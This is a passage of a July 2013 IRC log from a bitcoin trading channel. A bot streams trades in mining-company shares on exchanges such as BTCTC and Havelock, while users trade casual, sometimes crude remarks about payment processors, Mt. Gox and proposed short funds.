18:42:01 [BTCTC] [BASIC-MINING] 1 @ 0.5383 BTC [+] Jul 26 18:42:47 content monetization is needed when cheapskates dont want to pay useage fees Jul 26 18:43:04 [BTCTC] [ACTIVEMINING] 19 @ 0.004449 = 0.0845 BTC [-] Jul 26 18:44:17 [BTCTC] [BASIC-MINING] 1 @ 0.531 BTC [-] Jul 26 18:44:18 [BTCTC] [BASIC-MINING] 2 @ 0.53 = 1.06 BTC [-] Jul 26 18:44:20 [BTCTC] [BASIC-MINING] 15 @ 0.5201 = 7.8015 BTC [-] Jul 26 18:44:21 [BTCTC] [BASIC-MINING] 2 @ 0.52 = 1.04 BTC [-] Jul 26 18:44:23 [BTCTC] [BASIC-MINING] 1 @ 0.52 BTC [-] Jul 26 18:44:37 http://bitcoinmagazine.com/beef-and-bitcoin/ Jul 26 18:44:41 Beef and Bitcoin | Bitcoin MagazineBitcoin Magazine Jul 26 18:44:56 now there's an arbitrage play Jul 26 18:44:59 [HAVELOCK] [AM100] 20 @ 0.0421 = 0.842 BTC [-] Jul 26 18:45:11 stop fucking around with play "markets" and play "assets" and actually arb, eh? Jul 26 18:45:54 [BTCTC] [TAT.ASICMINER] 2 @ 0.026 = 0.052 BTC [-] Jul 26 18:46:34 [BTCTC] [TAT.ASICMINER] 2 @ 0.04512 = 0.0902 BTC [+] Jul 26 18:47:06 [BTCTC] [TAT.ASICMINER] 1 @ 0.026 BTC [-] Jul 26 18:47:21 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003197 = 0.032 BTC [+] Jul 26 18:47:23 [BTCTC] [TAT.VIRTUALMINE] 139 @ 0.003198 = 0.4445 BTC [+] Jul 26 18:47:52 [BTCTC] [TAT.ASICMINER] 1 @ 0.04512 BTC [+] Jul 26 18:48:39 [BTCTC] [ACTIVEMINING] 100 @ 0.0044 = 0.44 BTC [-] Jul 26 18:48:43 [BTCTC] [TAT.ASICMINER] 6 @ 0.04512 = 0.2707 BTC [+] Jul 26 18:48:56 [BTCTC] [TAT.ASICMINER] 5 @ 0.04579 = 0.229 BTC [+] Jul 26 18:49:31 kinda old, but relevant imho: https://bips.me/press/release/20130723 Jul 26 18:50:10 cool Jul 26 18:50:19 [BTCTC] [ACTIVEMINING] 50 @ 0.004356 = 0.2178 BTC [-] Jul 26 18:50:43 [BTCTC] [ACTIVEMINING] 50 @ 0.004356 = 0.2178 BTC [-] Jul 26 18:51:25 [BTCTC] [ACTIVEMINING] 100 @ 0.004356 = 0.4356 BTC [-] Jul 26 18:52:39 [BTCTC] [BASIC-MINING] 1 @ 0.5201 BTC [+] Jul 26 18:52:41 [BTCTC] [BASIC-MINING] 9 @ 0.52 = 4.68 BTC [-] Jul 26 18:53:13 [BTCTC] [DMS.SELLING] 10 @ 0.0205 = 0.205 BTC [+] Jul 26 18:54:14 change and revolutionize ? Jul 26 18:54:50 BIPS’s technology is a world-leading product Jul 26 18:54:57 i have no fucking idea what it even is. what is it ? Jul 26 18:55:09 a payment processor like bitpay.com Jul 26 18:55:29 mkay. Jul 26 18:55:34 world-leading as in "we're number of two, out of two"? Jul 26 18:55:54 so basically this means "hi, we're too stupid to have followed mp's get off gox orders in april. we're doinfg it in august" Jul 26 18:56:02 from coindesk: "BIPS is a two-year-old payment processor cited by Crunchbase as the largest provider of bitcoin payments in Europe." Jul 26 18:56:03 world leading & revolutionizing alright. Jul 26 18:56:14 [BTCTC] [RSM] 9 @ 0.0139 = 0.1251 BTC [-] Jul 26 18:56:38 Dealing with Mt. Gox was becoming increasingly unworkable, he told CoinDesk. Withdrawal times were the biggest bugbear. “In BIPS’ case, each withdrawal had a pending period of over eight weeks. This was devastating on BIPS’ fiat buffer, as we process withdrawals in 1 to 5 business days,” he complained. Jul 26 18:56:50 [BTCTC] [TAT.VIRTUALMINE] 145 @ 0.003199 = 0.4639 BTC [+] Jul 26 18:56:57 i can see it. Jul 26 18:57:07 [BTCTC] [TAT.ASICMINER] 25 @ 0.04569 = 1.1423 BTC [-] Jul 26 18:58:17 [BTCTC] [ASICMINER-PT] 1 @ 4.604 BTC [-] Jul 26 18:59:00 [BTCTC] [TAT.VIRTUALMINE] 211 @ 0.00321 = 0.6773 BTC [+] Jul 26 19:01:29 [BTCTC] [ACTIVEMINING] 45 @ 0.004399 = 0.198 BTC [+] Jul 26 19:02:57 [BTCTC] [TAT.VIRTUALMINE] 13 @ 0.003328 = 0.0433 BTC [+] Jul 26 19:06:16 [BTCTC] [TAT.ASICMINER] 2 @ 0.04567 = 0.0913 BTC [-] Jul 26 19:06:18 [BTCTC] [TAT.ASICMINER] 14 @ 0.04567 = 0.6394 BTC [-] Jul 26 19:07:07 [BTCTC] [ACTIVEMINING] 47 @ 0.004399 = 0.2068 BTC [+] Jul 26 19:07:11 [BTCTC] [TAT.ASICMINER] 2 @ 0.04569 = 0.0914 BTC [+] Jul 26 19:09:37 [BTCTC] [TAT.ASICMINER] 30 @ 0.04579 = 1.3737 BTC [+] Jul 26 19:10:18 ;;nethash Jul 26 19:10:19 245221.9755 Jul 26 19:10:24 ;;estimate Jul 26 19:10:25 Next difficulty estimate | 33075472.3109 based on data since last change | 34256591.5141 based on data for last three days Jul 26 19:10:33 ;;bcstats Jul 26 19:10:36 Current Blocks: 248565 | Current Difficulty: 3.125696072776893E7 | Next Difficulty At Block: 249983 | Next Difficulty In: 1418 blocks | Next Difficulty In About: 1 week, 1 day, 1 hour, 21 minutes, and 49 seconds | Next Difficulty Estimate: 33075472.3109 | Estimated Percent Change: 5.81794 Jul 26 19:10:47 [BTCTC] [TAT.ASICMINER] 10 @ 0.0455 = 0.455 BTC [-] Jul 26 19:12:18 [HAVELOCK] [SMG] 70 @ 0.0002699 = 0.0189 BTC [-] Jul 26 19:12:21 [BTCTC] [ACTIVEMINING] 19 @ 0.004399 = 0.0836 BTC [+] Jul 26 19:12:42 [BTCTC] [ACTIVEMINING] 100 @ 0.004399 = 0.4399 BTC [+] Jul 26 19:12:52 [BTCTC] [ACTIVEMINING] 160 @ 0.004399 = 0.7038 BTC [+] Jul 26 19:13:05 [BTCTC] [ACTIVEMINING] 1000 @ 0.0039 = 3.9 BTC [-] Jul 26 19:13:37 fuckers Jul 26 19:15:03 [BTCTC] [TAT.VIRTUALMINE] 25 @ 0.003232 = 0.0808 BTC [-] Jul 26 19:15:49 https://bitcointalk.org/index.php?topic=262849.0 Jul 26 19:16:04 Short Funds Coming Soon Jul 26 19:16:18 [BTCTC] [ASICMINER-PT] 1 @ 4.65 BTC [+] Jul 26 19:16:57 pankkake http://trilema.com/2013/the-story-of-pointless-and-witless/ Jul 26 19:17:17 [BTCTC] [ASICMINER-PT] 1 @ 4.604 BTC [-] Jul 26 19:17:22 [BTCTC] [ASICMINER-PT] 2 @ 4.6 = 9.2 BTC [-] Jul 26 19:18:09 hehe Jul 26 19:19:10 [BTCTC] [ACTIVEMINING] 15 @ 0.0043 = 0.0645 BTC [+] Jul 26 19:19:34 [BTCTC] [KENILWORTH] 1 @ 0.0018 BTC [+] Jul 26 19:19:35 it's called mathematical induction Jul 26 19:19:48 [BTCTC] [KENILWORTH] 1 @ 0.0018 BTC [+] Jul 26 19:20:01 reminds me of https://xkcd.com/386/ Jul 26 19:20:36 kinda Jul 26 19:20:38 [BTCTC] [ACTIVEMINING] 85 @ 0.0043 = 0.3655 BTC [+] Jul 26 19:20:40 [BTCTC] [ACTIVEMINING] 2 @ 0.0043 = 0.0086 BTC [+] Jul 26 19:20:41 [BTCTC] [ACTIVEMINING] 4 @ 0.00427 = 0.0171 BTC [-] Jul 26 19:20:42 [BTCTC] [ACTIVEMINING] 4 @ 0.004266 = 0.0171 BTC [-] Jul 26 19:20:43 [BTCTC] [ACTIVEMINING] 1400 @ 0.004266 = 5.9724 BTC [-] Jul 26 19:20:47 except in soviet romania bed comes to you Jul 26 19:20:52 [BTCTC] [ACTIVEMINING] 210 @ 0.004265 = 0.8957 BTC [-] Jul 26 19:20:54 [BTCTC] [ACTIVEMINING] 16 @ 0.004264 = 0.0682 BTC [-] Jul 26 19:20:55 [BTCTC] [ACTIVEMINING] 15 @ 0.004261 = 0.0639 BTC [-] Jul 26 19:20:57 [BTCTC] [ACTIVEMINING] 500 @ 0.00426 = 2.13 BTC [-] Jul 26 19:20:58 [BTCTC] [ACTIVEMINING] 10 @ 0.004251 = 0.0425 BTC [-] Jul 26 19:21:00 [BTCTC] [ACTIVEMINING] 2249 @ 0.00425 = 9.5583 BTC [-] Jul 26 19:21:02 [BTCTC] [ACTIVEMINING] 165 @ 0.00425 = 0.7013 BTC [-] Jul 26 19:21:14 [BTCTC] [ACTIVEMINING] 1000 @ 0.0039 = 3.9 BTC [-] Jul 26 19:21:37 "I will attempt to follow this thread and the crosspost on reddit throughout the day while I'm at work, and I will be able to respond more thoroughly to questions and comments after about 9pm UTC." Jul 26 19:21:50 anyone wanan bet what he does for a living "? Jul 26 19:22:20 [BTCTC] [ASICMINER-PT] 4 @ 4.654 = 18.616 BTC [+] Jul 26 19:23:39 [BTCTC] [ACTIVEMINING] 55 @ 0.004388 = 0.2413 BTC [+] Jul 26 19:24:14 you have no information about his timezone, do you? Jul 26 19:25:03 [MPEX] [S.MPOE] 20750 @ 0.0007725 = 16.0294 BTC [-] Jul 26 19:26:02 nope Jul 26 19:26:04 [HAVELOCK] [AM100] 1 @ 0.0434886 BTC [+] Jul 26 19:26:18 [BTCTC] [TAT.ASICMINER] 30 @ 0.0439 = 1.317 BTC [-] Jul 26 19:26:46 but he's paying interest on shares, so it's pretty clear how much he has to do with this line of work. Jul 26 19:29:12 I have a hard time understanding how his thing works Jul 26 19:29:39 read your chicken bones Jul 26 19:32:38 [BTCTC] [PAJKA.BOND] 2 @ 0.03702 = 0.074 BTC [-] Jul 26 19:33:17 [BTCTC] [ACTIVEMINING] 17 @ 0.004388 = 0.0746 BTC [+] Jul 26 19:33:47 [BTCTC] [ACTIVEMINING] 50 @ 0.004388 = 0.2194 BTC [+] Jul 26 19:35:35 [HAVELOCK] [SDSTM] 1 @ 0.0095 BTC [+] Jul 26 19:36:20 [BTCTC] [DMS.SELLING] 1 @ 0.0205 BTC [+] Jul 26 19:37:24 [BTCTC] [ACTIVEMINING] 15 @ 0.004387 = 0.0658 BTC [-] Jul 26 19:38:20 pankkake here's the cliffnotes : he's seen the brendio/deprived attempt at a synthetic short Jul 26 19:38:32 and he figures he can do it better. because internet. Jul 26 19:39:55 [BTCTC] [ACTIVEMINING] 133 @ 0.004388 = 0.5836 BTC [+] Jul 26 19:39:57 [BTCTC] [ACTIVEMINING] 72 @ 0.004388 = 0.3159 BTC [+] Jul 26 19:40:39 "For example, (these numbers are just illustrative) you might consider 1 share of ASICMINER-SHORT.LOAN = 1 share of ASICMINER-PT = 100 shares of TAT.ASICMINER. The shares will be directyl exchangeable (send 100-shares of TAT.ASICMINER to the Loan Fund, receive 1 share of the loan fund; or the reverse)." -> this would enable the conversion between tat.am and am-pt Jul 26 19:40:45 [BTCTC] [ACTIVEMINING] 1 @ 0.004387 BTC [-] Jul 26 19:41:13 [BTCTC] [ACTIVEMINING] 6 @ 0.004388 = 0.0263 BTC [+] Jul 26 19:41:16 [BTCTC] [ACTIVEMINING] 16 @ 0.004388 = 0.0702 BTC [+] Jul 26 19:41:18 [BTCTC] [ACTIVEMINING] 2 @ 0.004388 = 0.0088 BTC [+] Jul 26 19:41:30 [BTCTC] [ACTIVEMINING] 60 @ 0.004388 = 0.2633 BTC [+] Jul 26 19:41:44 [BTCTC] [ACTIVEMINING] 8 @ 0.004387 = 0.0351 BTC [-] Jul 26 19:42:38 [BTCTC] [ASICMINER-PT] 2 @ 4.606 = 9.212 BTC [-] Jul 26 19:43:24 [BTCTC] [TAT.ASICMINER] 1 @ 0.04539 BTC [+] Jul 26 19:48:50 [BTCTC] [KENILWORTH] 1 @ 0.0018 BTC [+] Jul 26 19:50:33 [BTCTC] [TAT.MINIGAME] 7 @ 0.000275 = 0.0019 BTC [+] Jul 26 19:50:35 [BTCTC] [KENILWORTH] 1 @ 0.0018 BTC [+] Jul 26 19:51:37 [BTCTC] [KENILWORTH] 1 @ 0.0018 BTC [+] Jul 26 19:52:28 [BTCTC] [ASICMINER-PT] 6 @ 4.6 = 27.6 BTC [-] Jul 26 19:53:11 [BTCTC] [ACTIVEMINING] 1 @ 0.004212 BTC [-] Jul 26 19:54:08 [HAVELOCK] [SDSTM] 1 @ 0.00854001 BTC [-] Jul 26 19:55:43 [HAVELOCK] [AM100] 3 @ 0.0431 = 0.1293 BTC [-] Jul 26 19:56:47 this would enable the conversion between tat.am and am-pt <<< his loss Jul 26 19:56:49 [BTCTC] [DMS.MINING] 25 @ 0.013 = 0.325 BTC [+] Jul 26 19:56:59 [BTCTC] [BITVPS] 133 @ 0.001803 = 0.2398 BTC [-] Jul 26 19:57:01 [BTCTC] [BITVPS] 20 @ 0.001802 = 0.036 BTC [-] Jul 26 19:57:03 [BTCTC] [BITVPS] 100 @ 0.0018 = 0.18 BTC [-] Jul 26 19:57:05 [BTCTC] [BITVPS] 1 @ 0.0018 BTC [-] Jul 26 19:57:07 [BTCTC] [BITVPS] 1 @ 0.00176 BTC [-] Jul 26 19:57:34 [BTCTC] [DMS.MINING] 8 @ 0.0133 = 0.1064 BTC [+] Jul 26 19:57:36 [BTCTC] [DMS.MINING] 17 @ 0.0133 = 0.2261 BTC [+] Jul 26 19:57:49 [BTCTC] [BITVPS] 42 @ 0.00175 = 0.0735 BTC [-] Jul 26 20:01:01 [BTCTC] [BASIC-MINING] 3 @ 0.5202 = 1.5606 BTC [+] Jul 26 20:01:27 [BTCTC] [KENILWORTH] 9 @ 0.0018 = 0.0162 BTC [+] Jul 26 20:02:27 [BTCTC] [ACTIVEMINING] 1 @ 0.004386 BTC [+] Jul 26 20:02:29 [BTCTC] [ACTIVEMINING] 15 @ 0.004386 = 0.0658 BTC [+] Jul 26 20:02:30 [BTCTC] [ACTIVEMINING] 145 @ 0.004387 = 0.6361 BTC [+] Jul 26 20:02:53 [BTCTC] [ASICMINER-PT] 5 @ 4.605 = 23.025 BTC [+] Jul 26 20:02:55 [BTCTC] [ASICMINER-PT] 1 @ 4.604 BTC [-] Jul 26 20:02:57 [BTCTC] [ASICMINER-PT] 1 @ 4.603 BTC [-] Jul 26 20:02:59 [BTCTC] [ASICMINER-PT] 1 @ 4.6 BTC [-] Jul 26 20:04:52 [BTCTC] [ACTIVEMINING] 200 @ 0.004388 = 0.8776 BTC [+] Jul 26 20:13:06 http://www.ted.com/talks/paul_kemp_robertson_bitcoin_sweat_tide_meet_the_future_of_branded_currency.html?utm_medium=on.ted.com-twitter&utm_content=addthis-custom&utm_campaign=&source=twitter&utm_source=t.co&awesm=on.ted.com_eg9h#.UfJ4eOPYHoV.twitter Jul 26 20:13:09 Paul Kemp-Robertson: Bitcoin. Sweat. Tide. Meet the future of branded currency. | Video on TED.com Jul 26 20:15:02 tl;dr? Jul 26 20:15:46 in which i prove that bitcoin can be more transparent than any other method of payment Jul 26 20:16:40 well ya cause tide is colored Jul 26 20:16:52 hehehe Jul 26 20:16:58 [BTCTC] [RSM] 1 @ 0.01435 BTC [+] Jul 26 20:17:19 unfortunately, that proof will prob be wasted on some idiot who hasn't figured out how to use google Jul 26 20:17:54 people are idiots, unfortunately, and talk about money usually brings out the most idiocy Jul 26 20:18:04 "hahaha, you are just describing a barter system" Jul 26 20:18:07 ... Jul 26 20:18:20 like dollars for something? i barter dollars, in exchange for your thing Jul 26 20:18:39 people imbue dollars (and by extension bitcoins) with all sorts of magical properties Jul 26 20:22:38 [BTCTC] [TAT.MINIGAME] 2 @ 0.000275 = 0.0006 BTC [+] Jul 26 20:24:58 [MPEX] [S.MPOE] 2000 @ 0.00077251 = 1.545 BTC [+] Jul 26 20:25:00 [MPEX] [S.MPOE] 398000 @ 0.0007725 = 307.455 BTC [-] Jul 26 20:31:04 things are just things? Jul 26 20:31:21 When that S.MPOE bid wall at 0.00077250 gets eaten, is that when we find out that MPEx bought S.DICE? Jul 26 20:32:12 [BTCTC] [TAT.ASICMINER] 69 @ 0.0451 = 3.1119 BTC [-] Jul 26 20:36:15 [BTCTC] [ASICMINER-PT] 1 @ 4.588 BTC [-] Jul 26 20:36:17 [BTCTC] [ASICMINER-PT] 10 @ 4.586 = 45.86 BTC [-] Jul 26 20:36:29 [BTCTC] [ASICMINER-PT] 1 @ 4.585 BTC [-] Jul 26 20:36:31 [BTCTC] [ASICMINER-PT] 11 @ 4.582 = 50.402 BTC [-] Jul 26 20:36:32 [BTCTC] [ASICMINER-PT] 2 @ 4.581 = 9.162 BTC [-] Jul 26 20:41:23 [HAVELOCK] [HIM] 4 @ 0.195 = 0.78 BTC [-] Jul 26 20:41:31 [HAVELOCK] [HIM] 1 @ 0.191 BTC [-] Jul 26 20:41:37 [HAVELOCK] [HIM] 1 @ 0.19000001 BTC [-] Jul 26 20:41:44 [MPEX] [S.MPOE] 13700 @ 0.0007725 = 10.5833 BTC [-] Jul 26 20:41:46 [HAVELOCK] [HIM] 20 @ 0.19 = 3.8 BTC [-] Jul 26 20:43:25 [HAVELOCK] [HIM] 1 @ 0.209 BTC [+] Jul 26 20:45:42 [BTCTC] [ASICMINER-PT] 6 @ 4.581 = 27.486 BTC [-] Jul 26 20:45:48 [BTCTC] [ASICMINER-PT] 2 @ 4.58 = 9.16 BTC [-] Jul 26 20:46:57 [BTCTC] [ASICMINER-PT] 2 @ 4.58 = 9.16 BTC [-] Jul 26 20:47:29 [BTCTC] [ACTIVEMINING] 100 @ 0.004387 = 0.4387 BTC [-] Jul 26 20:47:31 [BTCTC] [ACTIVEMINING] 491 @ 0.004388 = 2.1545 BTC [+] Jul 26 20:47:31 [BTCTC] [ACTIVEMINING] 985 @ 0.004389 = 4.3232 BTC [+] Jul 26 20:47:33 [BTCTC] [ACTIVEMINING] 100 @ 0.004399 = 0.4399 BTC [+] Jul 26 20:47:34 [BTCTC] [ACTIVEMINING] 247 @ 0.0044 = 1.0868 BTC [+] Jul 26 20:47:35 [BTCTC] [ACTIVEMINING] 100 @ 0.0044 = 0.44 BTC [+] Jul 26 20:47:36 [BTCTC] [ACTIVEMINING] 1135 @ 0.00442 = 5.0167 BTC [+] Jul 26 20:47:38 [BTCTC] [ACTIVEMINING] 1000 @ 0.00444 = 4.44 BTC [+] Jul 26 20:47:39 [BTCTC] [ACTIVEMINING] 1000 @ 0.004448 = 4.448 BTC [+] Jul 26 20:47:40 [BTCTC] [ACTIVEMINING] 617 @ 0.00445 = 2.7457 BTC [+] Jul 26 20:47:41 [BTCTC] [ACTIVEMINING] 1000 @ 0.004499 = 4.499 BTC [+] Jul 26 20:47:42 [BTCTC] [ACTIVEMINING] 950 @ 0.0045 = 4.275 BTC [+] Jul 26 20:47:44 [BTCTC] [ACTIVEMINING] 33 @ 0.0045 = 0.1485 BTC [+] Jul 26 20:47:44 [BTCTC] [ACTIVEMINING] 10 @ 0.0045 = 0.045 BTC [+] Jul 26 20:47:51 [BTCTC] [ACTIVEMINING] 49 @ 0.0045 = 0.2205 BTC [+] Jul 26 20:47:53 [BTCTC] [ACTIVEMINING] 589 @ 0.0045 = 2.6505 BTC [+] Jul 26 20:47:54 [BTCTC] [ACTIVEMINING] 1000 @ 0.0046 = 4.6 BTC [+] Jul 26 20:47:55 [BTCTC] [ACTIVEMINING] 1000 @ 0.00464 = 4.64 BTC [+] Jul 26 20:47:57 [BTCTC] [ACTIVEMINING] 294 @ 0.00465 = 1.3671 BTC [+] Jul 26 20:47:58 hah Jul 26 20:48:05 cancelled just in time Jul 26 20:48:24 maybe not Jul 26 20:49:31 http://www.indiegogo.com/projects/the-smart-charger-charging-on-the-go-for-iphone-android-the-ubuntu-edge Jul 26 20:49:33 The Smart Charger: Charging On-The-Go For iPhone, Android &The Ubuntu Edge | Indiegogo Jul 26 20:50:04 I thought S.DICE was getting delisted Jul 26 20:51:13 it already has been Jul 26 20:52:34 [BTCTC] [ACTIVEMINING] 100 @ 0.004699 = 0.4699 BTC [+] Jul 26 20:54:17 [HAVELOCK] [SDSTM] 1 @ 0.009 BTC [+] Jul 26 20:54:38 [HAVELOCK] [SDSTM] 1 @ 0.009 BTC [+] Jul 26 20:54:55 [HAVELOCK] [SDSTM] 2 @ 0.0091 = 0.0182 BTC [+] Jul 26 20:57:04 [BTCTC] [ACTIVEMINING] 200 @ 0.004698 = 0.9396 BTC [-] Jul 26 20:57:15 [HAVELOCK] [SDSTM] 3 @ 0.009 = 0.027 BTC [-] Jul 26 20:57:17 [HAVELOCK] [SDSTM] 6 @ 0.00891 = 0.0535 BTC [-] Jul 26 20:57:20 [HAVELOCK] [SDSTM] 1 @ 0.00885 BTC [-] Jul 26 21:01:29 [BTCTC] [RSM] 18 @ 0.01392 = 0.2506 BTC [-] Jul 26 21:01:32 [BTCTC] [RSM] 10 @ 0.01393 = 0.1393 BTC [+] Jul 26 21:01:34 [BTCTC] [RSM] 50 @ 0.014 = 0.7 BTC [+] Jul 26 21:01:36 [BTCTC] [RSM] 22 @ 0.01438 = 0.3164 BTC [+] Jul 26 21:02:08 [HAVELOCK] [SDSTM] 4 @ 0.00885 = 0.0354 BTC [-] Jul 26 21:02:11 [HAVELOCK] [SDSTM] 10 @ 0.00870001 = 0.087 BTC [-] Jul 26 21:02:13 [HAVELOCK] [SDSTM] 4 @ 0.00860002 = 0.0344 BTC [-] Jul 26 21:02:15 [HAVELOCK] [SDSTM] 1 @ 0.00860001 BTC [-] Jul 26 21:03:58 [HAVELOCK] [AM100] 1 @ 0.04312 BTC [+] Jul 26 21:04:11 [BTCTC] [ACTIVEMINING] 520 @ 0.0046 = 2.392 BTC [-] Jul 26 21:04:14 [HAVELOCK] [AM100] 3 @ 0.04311111 = 0.1293 BTC [-] Jul 26 21:04:20 [HAVELOCK] [AM100] 8 @ 0.04310001 = 0.3448 BTC [-] Jul 26 21:04:33 [HAVELOCK] [AM100] 80 @ 0.0431 = 3.448 BTC [-] Jul 26 21:05:11 [HAVELOCK] [SDSTM] 10 @ 0.0085 = 0.085 BTC [-] Jul 26 21:06:08 [BTCTC] [TAT.ASICMINER] 25 @ 0.04527 = 1.1318 BTC [+] Jul 26 21:07:34 [BTCTC] [ACTIVEMINING] 20 @ 0.004694 = 0.0939 BTC [+] Jul 26 21:08:15 [BTCTC] [ACTIVEMINING] 10 @ 0.004695 = 0.047 BTC [+] Jul 26 21:10:25 [BTCTC] [ACTIVEMINING] 25 @ 0.004508 = 0.1127 BTC [-] Jul 26 21:10:27 [BTCTC] [ACTIVEMINING] 50 @ 0.004507 = 0.2254 BTC [-] Jul 26 21:10:31 [BTCTC] [ACTIVEMINING] 85 @ 0.004506 = 0.383 BTC [-] Jul 26 21:12:55 [BTCTC] [ACTIVEMINING] 25 @ 0.004512 = 0.1128 BTC [+] Jul 26 21:14:24 [BTCTC] [ACTIVEMINING] 25 @ 0.004513 = 0.1128 BTC [+] Jul 26 21:16:11 [BTCTC] [ASICMINER-PT] 1 @ 4.609 BTC [+] Jul 26 21:17:39 [BTCTC] [ACTIVEMINING] 25 @ 0.004523 = 0.1131 BTC [+] Jul 26 21:17:43 [BTCTC] [ACTIVEMINING] 20 @ 0.004522 = 0.0904 BTC [-] Jul 26 21:17:45 [BTCTC] [ACTIVEMINING] 65 @ 0.00452 = 0.2938 BTC [-] Jul 26 21:17:47 [BTCTC] [ACTIVEMINING] 95 @ 0.004515 = 0.4289 BTC [-] Jul 26 21:17:48 [BTCTC] [ACTIVEMINING] 72 @ 0.004514 = 0.325 BTC [-] Jul 26 21:17:50 [BTCTC] [ACTIVEMINING] 1 @ 0.004511 BTC [-] Jul 26 21:17:51 [BTCTC] [ACTIVEMINING] 20 @ 0.004505 = 0.0901 BTC [-] Jul 26 21:17:53 [BTCTC] [ACTIVEMINING] 202 @ 0.004505 = 0.91 BTC [-] Jul 26 21:18:00 [BTCTC] [ACTIVEMINING] 10 @ 0.004692 = 0.0469 BTC [+] Jul 26 21:20:01 [BTCTC] [ACTIVEMINING] 25 @ 0.00469 = 0.1173 BTC [-] Jul 26 21:24:00 [BTCTC] [KENILWORTH] 10 @ 0.0018 = 0.018 BTC [+] Jul 26 21:25:17 [BTCTC] [ASICMINER-PT] 1 @ 4.609 BTC [+] Jul 26 21:26:07 [BTCTC] [TAT.ASICMINER] 6 @ 0.0451 = 0.2706 BTC [-] Jul 26 21:26:33 [BTCTC] [TAT.ASICMINER] 20 @ 0.04501 = 0.9002 BTC [-] Jul 26 21:27:32 [BTCTC] [TAT.ASICMINER] 13 @ 0.045 = 0.585 BTC [-] Jul 26 21:27:36 [BTCTC] [TAT.ASICMINER] 26 @ 0.045 = 1.17 BTC [-] Jul 26 21:27:38 [BTCTC] [TAT.ASICMINER] 10 @ 0.045 = 0.45 BTC [-] Jul 26 21:27:40 [BTCTC] [TAT.ASICMINER] 2 @ 0.045 = 0.09 BTC [-] Jul 26 21:27:42 [BTCTC] [TAT.ASICMINER] 29 @ 0.045 = 1.305 BTC [-] Jul 26 21:28:55 [HAVELOCK] [AM100] 80 @ 0.0431 = 3.448 BTC [-] Jul 26 21:30:48 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.003328 BTC [+] Jul 26 21:30:50 [BTCTC] [ACTIVEMINING] 90 @ 0.004692 = 0.4223 BTC [+] Jul 26 21:30:52 [BTCTC] [TAT.ASICMINER] 7 @ 0.04517 = 0.3162 BTC [+] Jul 26 21:30:53 [BTCTC] [ACTIVEMINING] 85 @ 0.004692 = 0.3988 BTC [+] Jul 26 21:30:57 [BTCTC] [ACTIVEMINING] 100 @ 0.004694 = 0.4694 BTC [+] **** BEGIN LOGGING AT Sat Jul 27 04:08:48 2013 Jul 27 04:10:20 [BTCTC] [KENILWORTH] 40 @ 0.001771 = 0.0708 BTC [-] Jul 27 04:11:18 hollywoodundead lol Jul 27 04:12:26 [BTCTC] [COG.F] 1 @ 8 BTC [-] Jul 27 04:12:47 Namworld lol #2 Jul 27 04:12:50 ahh this chan's such a riot. Jul 27 04:14:52 [BTCTC] [ACTIVEMINING] 20 @ 0.005261 = 0.1052 BTC [-] Jul 27 04:15:00 [BTCTC] [DMS.SELLING] 83 @ 0.0205 = 1.7015 BTC [+] Jul 27 04:15:02 [BTCTC] [DMS.SELLING] 29 @ 0.0205 = 0.5945 BTC [+] Jul 27 04:15:03 [BTCTC] [DMS.SELLING] 24 @ 0.02052 = 0.4925 BTC [+] Jul 27 04:15:05 [BTCTC] [DMS.SELLING] 51 @ 0.02089 = 1.0654 BTC [+] Jul 27 04:15:30 [BTCTC] [TAT.ASICMINER] 11 @ 0.04463 = 0.4909 BTC [-] Jul 27 04:16:33 [BTCTC] [TAT.ASICMINER] 40 @ 0.04455 = 1.782 BTC [-] Jul 27 04:17:39 [BTCTC] [ACTIVEMINING] 25 @ 0.00547 = 0.1368 BTC [+] Jul 27 04:18:04 [BTCTC] [ACTIVEMINING] 37 @ 0.005471 = 0.2024 BTC [+] Jul 27 04:18:36 [BTCTC] [ACTIVEMINING] 50 @ 0.005473 = 0.2737 BTC [+] Jul 27 04:18:43 [HAVELOCK] [SMG] 336 @ 0.0002699 = 0.0907 BTC [-] Jul 27 04:19:10 [BTCTC] [ACTIVEMINING] 34 @ 0.005478 = 0.1863 BTC [+] Jul 27 04:21:19 [BTCTC] [ACTIVEMINING] 44 @ 0.005478 = 0.241 BTC [+] Jul 27 04:21:21 [BTCTC] [ACTIVEMINING] 6 @ 0.005479 = 0.0329 BTC [+] Jul 27 04:21:44 [BTCTC] [ACTIVEMINING] 44 @ 0.005479 = 0.2411 BTC [+] Jul 27 04:22:21 [BTCTC] [ACTIVEMINING] 18 @ 0.00548 = 0.0986 BTC [+] Jul 27 04:22:37 [BTCTC] [ACTIVEMINING] 100 @ 0.005489 = 0.5489 BTC [+] Jul 27 04:23:59 [BTCTC] [ACTIVEMINING] 57 @ 0.00549 = 0.3129 BTC [+] Jul 27 04:24:39 [BTCTC] [ASICMINER-PT] 1 @ 4.55 BTC [-] Jul 27 04:30:40 [HAVELOCK] [AM100] 5 @ 0.04339968 = 0.217 BTC [-] Jul 27 04:35:33 [HAVELOCK] [AM100] 5 @ 0.042501 = 0.2125 BTC [-] Jul 27 04:37:54 [BTCTC] [ACTIVEMINING] 25 @ 0.005381 = 0.1345 BTC [-] Jul 27 04:38:17 [BTCTC] [ACTIVEMINING] 25 @ 0.005382 = 0.1346 BTC [+] Jul 27 04:38:43 [BTCTC] [ACTIVEMINING] 25 @ 0.005382 = 0.1346 BTC [+] Jul 27 04:39:03 [HAVELOCK] [AM100] 15 @ 0.042501 = 0.6375 BTC [-] Jul 27 04:44:31 http://trilema.com/2013/mpoe-july-2013-statement/ Jul 27 04:44:34 MPOE, July 2013 Statement pe Trilema - Un blog de Mircea Popescu. Jul 27 04:44:44 [BTCTC] [ASICMINER-PT] 1 @ 4.542 BTC [-] Jul 27 04:46:57 wow very nice month mircea Jul 27 04:47:57 hollywoodundead yeah a good one Jul 27 04:48:22 [HAVELOCK] [SDSTM] 5 @ 0.009 = 0.045 BTC [-] Jul 27 04:49:03 [HAVELOCK] [SDSTM] 1 @ 0.0088 BTC [-] Jul 27 04:53:28 [BTCTC] [ACTIVEMINING] 25 @ 0.005397 = 0.1349 BTC [+] Jul 27 04:53:39 [BTCTC] [TAT.ASICMINER] 5 @ 0.04469 = 0.2235 BTC [+] Jul 27 04:53:51 [BTCTC] [TAT.ASICMINER] 3 @ 0.04469 = 0.1341 BTC [+] Jul 27 04:54:06 [BTCTC] [ACTIVEMINING] 25 @ 0.005481 = 0.137 BTC [+] Jul 27 04:57:27 go sandstorm wooooooooo Jul 27 04:57:59 [HAVELOCK] [AM100] 3 @ 0.0425 = 0.1275 BTC [-] Jul 27 